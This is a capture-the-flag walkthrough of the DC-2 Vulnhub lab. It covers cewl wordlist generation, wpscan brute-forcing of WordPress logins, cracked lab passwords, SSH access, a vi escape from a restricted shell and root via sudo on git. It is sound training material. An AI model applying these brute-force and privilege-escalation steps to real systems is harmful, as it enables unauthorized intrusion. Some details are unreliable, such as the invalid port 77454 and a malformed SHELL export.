PENETATION TEST REPORT

DC2 VULNHUB

SREERAJ K
Sreeraj898@gmail.com
Table of Contents

Introduction

Active Information Gathering

Vulnerability Scanning

Exploitation

Enumeration and Privilege Escalation

Important Takeaway from this lab

Introduction
To find the 5 flags. These flags are hints for further steps. The location of these
flags are just an indicator where a good penetration tester should look. An
alternative approach could also be to directly get to root.

Penetrating Methodology

• Discovering Targets IP
• Network scanning (Nmap)
• Adding the Domain name to Host file
• Surfing HTTP service port
• Using WPscan for Username enumeration
• Using cewl for creating wordlist
• Logging into WordPress
• Logging in through SSH
• Escaping restricted shell
• Finding binary in the sudoers list
• Getting root access and Reading final flag
Active Information Gathering
• Host Discovery and Port scanning

There was only two services running on the victim system, HTTP and SSH. HTTP
services are running, means it must have a webpage. Browsing the website
gives us our first flag.

The Flag option on the webpage clearly got our attention. Let’s check what hint
it has for us. So from this page, we got a really good hint to move ahead.
Vulnerability Scanning
I directly moved on to this step as this is my personal lab environment. I used
nmap to find vulnerabilities in Wordpress webapp.

So, the first idea that came to us was to run a wpscan on the webpage and see
what the scan enumerates.

The above results gave us some information:

1. File enumeration: /wp-login.php , …. , /readme.html

2. Users Enumeration: admin, tom, jerry
Exploitation
Therefore, we have used cewl to build a wordlist for passwords from inside
//dc-2 as shown in the image.

cewl //dc-2/ > password

cat password

Time to fire up wpscan with our username & password list to valid user login
combination.

wpscan --url http://dc-2 -U users -P password

We got the below results from brute forcing:

1. we have only validated that there is a user admin.

2. We have validated a user jerry and password of jerry is adipiscing.
3. We have validated a user tom and password of tom is parturient.
 We login using the credentials for jerry and tom and try to find our flags.
Traversing the admin panel, we find flag2

Since the clue was telling us to find another entry point to reach our final flag.
Suddenly we thought to make an SSH Login running on port 77454 by using
Tom credentials.
ssh tom@192.168.1.6 -p 7744
ls
cat flag3.txt
echo $PATH
ls /home/tom/usr/bin
Enumeration and Privilege Escalation
As you can observe that cat program is not present inside /bin and tom can run
only five programs present inside /bin directory.

Since we had a restricted shell, we found that we can use the Vi editor.
Therefore, we use Vi editor to escape the restricted shell.

After escaping the restricted shell, we export “/bin/bash” as our SHELL

environment variable and “/usr/bin” as our PATH environment variable so that
we can run Linux commands properly.

export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash:$SHELL

After that, we try to open flag3.txt again using cat command and luckily found
next hint to move ahead.

ls
cat flag3.txt

According to hint, now we need to switch user from tom to jerry but we don’t
have jerry’s login credential. Then checked the sudoers list and found that tom
can run “/usr/bin/git” as root without a password.
sudo -l
Having the root permission on git was like the cherry on the cake, because
through this I can try to escalate low privilege shell to high privilege shell.
We got the root access, then we switch to the root directory and found our
final flag.
cd /root
ls
cat final-flag.txt

Conclusion
This was a good step up from the previous box since we needed to create our
own wordlist for bruteforce using cewl. A perfect VM for beginners. We could
use ports other than 22 for SSH. These are used by administrator to harden
their security. We need a tool for URL enumeration like DIRB so that we find
other webpages accessible.. We touched “sudo -l” and privilege escalation
concepts to get root access.